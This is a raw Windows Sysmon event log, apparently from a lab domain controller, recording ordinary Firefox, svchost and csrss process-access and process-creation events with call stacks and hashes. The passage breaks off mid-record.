Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.083{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.083{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.067{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.042{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.6.1298242966\1586886060" -childID 1 -isForBrowser -prefsHandle 2396 -prefMapHandle 1884 -prefsLen 1027 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 2408 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.036{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.005{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c841|C:\Program Files\Mozilla Firefox\xul.dll+1722d45|C:\Program Files\Mozilla Firefox\xul.dll+1723f6f|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000016717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c641|C:\Program Files\Mozilla Firefox\xul.dll+1722afd|C:\Program Files\Mozilla Firefox\xul.dll+1723f67|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000016716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c441|C:\Program Files\Mozilla Firefox\xul.dll+172286f|C:\Program Files\Mozilla Firefox\xul.dll+1723f5f|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+2fe32dd|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000016918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.948{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.948{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.927{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba6854|C:\Program Files\Mozilla Firefox\xul.dll+2ba89c6|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla 